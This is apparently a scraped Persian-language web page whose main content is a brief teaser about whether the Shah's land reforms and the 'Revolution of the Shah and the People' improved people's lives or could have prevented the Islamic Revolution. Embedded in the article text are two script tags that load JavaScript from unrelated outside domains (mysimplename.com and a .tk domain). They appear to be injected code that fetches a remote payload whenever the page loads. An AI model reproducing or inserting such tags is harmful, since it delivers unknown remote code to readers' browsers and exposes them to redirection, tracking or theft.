انقلاب شاه و مردم يا انقلاب مردمى؟


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>آيا محمدرضاشاه تونست با اصلاحات ارضى تغييرى تو وضعيت مردم ايجاد كنه؟! آيا انقلاب موسوم به شاه و مردم تونست از تحولات اجتماعى جلوگيرى كنه؟! اصلا چرا اين همه اصلاحات شاهِ پهلوى نتونست جلوى وقوع انقلاب اسلامى رو بگيره؟!<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر